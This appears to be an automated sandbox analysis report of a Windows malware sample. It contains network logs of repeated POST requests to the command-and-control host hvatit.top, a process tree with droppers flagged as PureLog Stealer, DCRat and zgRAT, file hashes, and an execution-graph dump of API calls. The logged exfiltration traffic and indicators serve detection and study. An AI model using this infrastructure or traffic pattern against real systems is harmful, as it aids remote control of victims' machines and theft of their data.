                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:04.302395105 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:04.610225916 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:04.739881992 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        140 | 192.168.2.4 | 49878 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:04.870266914 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:05.226283073 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:05.541541100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:05.736587048 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        141 | 192.168.2.4 | 49879 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:05.876082897 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:06.224380016 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:06.558588028 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        142 | 192.168.2.4 | 49880 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:06.684086084 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:07.038311958 CEST | 1436 | OUT
                                                        Aug 31, 2024 09:34:07.353207111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:07.551707029 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        143 | 192.168.2.4 | 49881 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:06.802707911 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:07.162280083 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:07.471966028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:07.600575924 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        144 | 192.168.2.4 | 49882 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:07.725974083 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:34:08.083642006 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:08.394990921 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:08.529712915 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        145 | 192.168.2.4 | 49883 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:08.653000116 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:09.006283045 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:09.323337078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:09.464436054 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        146 | 192.168.2.4 | 49884 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:09.588500023 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:09.943098068 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:10.284547091 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:10.415906906 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        147 | 192.168.2.4 | 49885 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:10.537205935 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:10.898277044 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:11.202346087 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:11.331969023 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        148 | 192.168.2.4 | 49886 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:11.460190058 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:34:11.818041086 CEST | 2560 | OUT
                                                        Aug 31, 2024 09:34:12.123125076 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:34:12.329957962 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:34:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        149 | 192.168.2.4 | 49887 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:34:12.464144945 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Target ID:0
                                                        Start time:03:31:53
                                                        Start date:31/08/2024
                                                        Path:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\cuAvoExY41.exe"
                                                        Imagebase:0xfb0000
                                                        File size:2'278'706 bytes
                                                        MD5 hash:7DDACBFDACD9E8AEACD1B0F2DEA51F4E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1648685230.0000000006E22000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1648218136.000000000652A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:03:31:53
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe"
                                                        Imagebase:0x250000
                                                        File size:147'456 bytes
                                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                                        Imagebase:0x240000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:03:31:57
                                                        Start date:31/08/2024
                                                        Path:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"
                                                        Imagebase:0xb30000
                                                        File size:1'956'864 bytes
                                                        MD5 hash:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1685720678.0000000000B32000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1715284675.0000000013407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 92%, ReversingLabs
                                                        • Detection: 55%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat"
                                                        Imagebase:0x7ff6a9b20000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:03:31:59
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\chcp.com
                                                        Wow64 process (32bit):false
                                                        Commandline:chcp 65001
                                                        Imagebase:0x7ff691f30000
                                                        File size:14'848 bytes
                                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:03:32:00
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\System32\PING.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:ping -n 10 localhost
                                                        Imagebase:0x7ff72f460000
                                                        File size:22'528 bytes
                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:03:32:09
                                                        Start date:31/08/2024
                                                        Path:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"
                                                        Imagebase:0x830000
                                                        File size:1'956'864 bytes
                                                        MD5 hash:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 92%, ReversingLabs
                                                        • Detection: 55%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:9.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:9.2%
                                                          Total number of Nodes:1517
                                                          Total number of Limit Nodes:43
API calls __InternalCxxFrameHandler 24483->24535 24534 fc1fac CharUpperW 24484->24534 24487 fb823b 24487->24209 24489 fb7c22 24488->24489 24490 fb7c5a 24489->24490 24536 fb6e7a 74 API calls 24489->24536 24490->24220 24492 fb7c52 24537 fb138b 74 API calls 24492->24537 24494->24272 24496 fb9db3 24495->24496 24499 fb9dc2 24495->24499 24497 fb9db9 FlushFileBuffers 24496->24497 24496->24499 24497->24499 24498 fb9e3f SetFileTime 24498->24277 24499->24498 24500->24199 24501->24210 24502->24210 24503->24220 24504->24220 24505->24216 24506->24224 24507->24222 24508->24224 24510 fb8b5a 24509->24510 24511 fb98c5 GetFileType 24509->24511 24510->24242 24512 fb2021 74 API calls 24510->24512 24511->24510 24512->24240 24513->24242 24514->24245 24515->24268 24516->24268 24517->24268 24518->24268 24519->24268 24520->24270 24521->24281 24522->24271 24529 fb5b48 24523->24529 24525 fb5c6c 24525->24479 24527 fb5b48 2 API calls 24527->24525 24528->24479 24530 fb5b52 24529->24530 24532 fb5c3a 24530->24532 24533 fbb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24530->24533 24532->24525 24532->24527 24533->24530 24534->24487 24535->24484 24536->24492 24537->24490 24539 fbcef2 24538->24539 24544 fba99e 24539->24544 24541 fbcf24 24542 fba99e 86 API calls 24541->24542 24543 fbcf2f 24542->24543 24545 fba9c1 24544->24545 24548 fba9d5 24544->24548 24549 fc0eed 86 API calls 24545->24549 24547 fba9c8 24547->24548 24548->24541 24549->24547 24550->24289 24552 fba6a8 24551->24552 24553 fba6c1 FindFirstFileW 24552->24553 24554 fba727 FindNextFileW 24552->24554 24555 fba6d0 24553->24555 24561 fba709 24553->24561 24556 fba732 GetLastError 24554->24556 24554->24561 24557 fbbb03 GetCurrentDirectoryW 24555->24557 24556->24561 24558 fba6e0 24557->24558 24559 fba6fe GetLastError 24558->24559 24560 fba6e4 FindFirstFileW 24558->24560 24559->24561 24560->24559 24560->24561 24561->24140 24571 fca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24562->24571 24564 fca5cd 24565 fca5d9 24564->24565 24572 
fca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24564->24572 24565->23792 24565->23793 24567->23799 24568->23802 24569->23802 24570->23805 24571->24564 24572->24565 24573->23813 24575 fb9f42 78 API calls 24574->24575 24576 fb1fe8 24575->24576 24577 fb1a04 101 API calls 24576->24577 24580 fb2005 24576->24580 24578 fb1ff5 24577->24578 24578->24580 24581 fb138b 74 API calls 24578->24581 24580->23821 24580->23822 24581->24580 24583 fcb5bc GetDlgItem 24582->24583 24584 fcb583 GetMessageW 24582->24584 24583->23832 24583->23833 24585 fcb5a8 TranslateMessage DispatchMessageW 24584->24585 24586 fcb599 IsDialogMessageW 24584->24586 24585->24583 24586->24583 24586->24585 25332 fc94e0 GetClientRect 25368 fc21e0 26 API calls std::bad_exception::bad_exception 25390 fcf2e0 46 API calls __RTC_Initialize 25391 fdbee0 GetCommandLineA GetCommandLineW 25392 fd0ada 51 API calls 2 library calls 24651 fce2d7 24652 fce1db 24651->24652 24653 fce85d ___delayLoadHelper2@8 14 API calls 24652->24653 24653->24652 24656 fce1d1 14 API calls ___delayLoadHelper2@8 25406 fda3d0 21 API calls 2 library calls 24657 fb10d5 24662 fb5abd 24657->24662 24663 fb5ac7 __EH_prolog 24662->24663 24664 fbb505 84 API calls 24663->24664 24665 fb5ad3 24664->24665 24669 fb5cac GetCurrentProcess GetProcessAffinityMask 24665->24669 25407 fe2bd0 VariantClear 25333 fcf4d3 20 API calls 25395 fc62ca 123 API calls __InternalCxxFrameHandler 25370 fcb5c0 100 API calls 25409 fc77c0 118 API calls 25410 fcffc0 RaiseException _com_error::_com_error CallUnexpected 24678 fcdec2 24679 fcdecf 24678->24679 24680 fbe617 53 API calls 24679->24680 24681 fcdedc 24680->24681 24682 fb4092 _swprintf 51 API calls 24681->24682 24683 fcdef1 SetDlgItemTextW 24682->24683 24684 fcb568 5 API calls 24683->24684 24685 fcdf0e 24684->24685 25411 fc1bbd GetCPInfo IsDBCSLeadByte 24690 fce5b1 24691 fce578 24690->24691 24691->24690 24692 fce85d ___delayLoadHelper2@8 14 API calls 24691->24692 24692->24691 24820 fcf3b2 24821 fcf3be 
___scrt_is_nonwritable_in_current_image 24820->24821 24852 fceed7 24821->24852 24823 fcf3c5 24824 fcf518 24823->24824 24827 fcf3ef 24823->24827 24925 fcf838 4 API calls 2 library calls 24824->24925 24826 fcf51f 24918 fd7f58 24826->24918 24829 fcf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24827->24829 24863 fd8aed 24827->24863 24837 fcf48f 24829->24837 24921 fd7af4 38 API calls 3 library calls 24829->24921 24835 fcf40e 24871 fcf953 GetStartupInfoW __cftof 24837->24871 24839 fcf495 24872 fd8a3e 51 API calls 24839->24872 24842 fcf49d 24873 fcdf1e 24842->24873 24846 fcf4b1 24846->24826 24847 fcf4b5 24846->24847 24848 fcf4be 24847->24848 24923 fd7efb 28 API calls _abort 24847->24923 24924 fcf048 12 API calls ___scrt_uninitialize_crt 24848->24924 24851 fcf4c6 24851->24835 24853 fceee0 24852->24853 24927 fcf654 IsProcessorFeaturePresent 24853->24927 24855 fceeec 24928 fd2a5e 24855->24928 24857 fceef1 24862 fceef5 24857->24862 24936 fd8977 24857->24936 24860 fcef0c 24860->24823 24862->24823 24864 fd8b04 24863->24864 24865 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24864->24865 24866 fcf408 24865->24866 24866->24835 24867 fd8a91 24866->24867 24868 fd8ac0 24867->24868 24869 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24868->24869 24870 fd8ae9 24869->24870 24870->24829 24871->24839 24872->24842 25029 fc0863 24873->25029 24877 fcdf3d 25078 fcac16 24877->25078 24879 fcdf46 __cftof 24880 fcdf59 GetCommandLineW 24879->24880 24881 fcdf68 24880->24881 24882 fcdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24880->24882 25082 fcc5c4 24881->25082 24884 fb4092 _swprintf 51 API calls 24882->24884 24886 fce04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24884->24886 25093 fcb6dd LoadBitmapW 24886->25093 24888 fcdf76 OpenFileMappingW 24891 fcdf8f MapViewOfFile 24888->24891 24892 fcdfd6 CloseHandle 24888->24892 24889 fcdfe0 25087 fcdbde 24889->25087 24895 fcdfcd UnmapViewOfFile 
24891->24895 24896 fcdfa0 __InternalCxxFrameHandler 24891->24896 24892->24882 24895->24892 24900 fcdbde 2 API calls 24896->24900 24902 fcdfbc 24900->24902 24901 fc90b7 8 API calls 24903 fce0aa DialogBoxParamW 24901->24903 24902->24895 24904 fce0e4 24903->24904 24905 fce0fd 24904->24905 24906 fce0f6 Sleep 24904->24906 24908 fce10b 24905->24908 25123 fcae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24905->25123 24906->24905 24909 fce12a DeleteObject 24908->24909 24910 fce13f DeleteObject 24909->24910 24911 fce146 24909->24911 24910->24911 24912 fce177 24911->24912 24914 fce189 24911->24914 25124 fcdc3b 6 API calls 24912->25124 25120 fcac7c 24914->25120 24916 fce17d CloseHandle 24916->24914 24917 fce1c3 24922 fcf993 GetModuleHandleW 24917->24922 25254 fd7cd5 24918->25254 24921->24837 24922->24846 24923->24848 24924->24851 24925->24826 24927->24855 24940 fd3b07 24928->24940 24931 fd2a67 24931->24857 24933 fd2a6f 24934 fd2a7a 24933->24934 24954 fd3b43 DeleteCriticalSection 24933->24954 24934->24857 24983 fdc05a 24936->24983 24939 fd2a7d 7 API calls 2 library calls 24939->24862 24941 fd3b10 24940->24941 24943 fd3b39 24941->24943 24944 fd2a63 24941->24944 24955 fd3d46 24941->24955 24960 fd3b43 DeleteCriticalSection 24943->24960 24944->24931 24946 fd2b8c 24944->24946 24976 fd3c57 24946->24976 24949 fd2ba1 24949->24933 24951 fd2baf 24952 fd2bbc 24951->24952 24982 fd2bbf 6 API calls ___vcrt_FlsFree 24951->24982 24952->24933 24954->24931 24961 fd3c0d 24955->24961 24958 fd3d7e InitializeCriticalSectionAndSpinCount 24959 fd3d69 24958->24959 24959->24941 24960->24944 24962 fd3c26 24961->24962 24963 fd3c4f 24961->24963 24962->24963 24968 fd3b72 24962->24968 24963->24958 24963->24959 24966 fd3c3b GetProcAddress 24966->24963 24967 fd3c49 24966->24967 24967->24963 24973 fd3b7e ___vcrt_FlsFree 24968->24973 24969 fd3bf3 24969->24963 24969->24966 24970 fd3b95 LoadLibraryExW 24971 fd3bfa 24970->24971 24972 fd3bb3 GetLastError 24970->24972 24971->24969 24974 fd3c02 FreeLibrary 
24971->24974 24972->24973 24973->24969 24973->24970 24975 fd3bd5 LoadLibraryExW 24973->24975 24974->24969 24975->24971 24975->24973 24977 fd3c0d ___vcrt_FlsFree 5 API calls 24976->24977 24978 fd3c71 24977->24978 24979 fd3c8a TlsAlloc 24978->24979 24980 fd2b96 24978->24980 24980->24949 24981 fd3d08 6 API calls ___vcrt_FlsFree 24980->24981 24981->24951 24982->24949 24986 fdc077 24983->24986 24987 fdc073 24983->24987 24984 fcfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24985 fceefe 24984->24985 24985->24860 24985->24939 24986->24987 24989 fda6a0 24986->24989 24987->24984 24990 fda6ac ___scrt_is_nonwritable_in_current_image 24989->24990 25001 fdac31 EnterCriticalSection 24990->25001 24992 fda6b3 25002 fdc528 24992->25002 24994 fda6c2 25000 fda6d1 24994->25000 25015 fda529 29 API calls 24994->25015 24997 fda6cc 25016 fda5df GetStdHandle GetFileType 24997->25016 24999 fda6e2 _abort 24999->24986 25017 fda6ed LeaveCriticalSection _abort 25000->25017 25001->24992 25003 fdc534 ___scrt_is_nonwritable_in_current_image 25002->25003 25004 fdc558 25003->25004 25005 fdc541 25003->25005 25018 fdac31 EnterCriticalSection 25004->25018 25026 fd91a8 20 API calls __dosmaperr 25005->25026 25008 fdc546 25027 fd9087 26 API calls __cftof 25008->25027 25010 fdc590 25028 fdc5b7 LeaveCriticalSection _abort 25010->25028 25011 fdc550 _abort 25011->24994 25012 fdc564 25012->25010 25019 fdc479 25012->25019 25015->24997 25016->25000 25017->24999 25018->25012 25020 fdb136 __dosmaperr 20 API calls 25019->25020 25021 fdc48b 25020->25021 25024 fdaf0a 11 API calls 25021->25024 25025 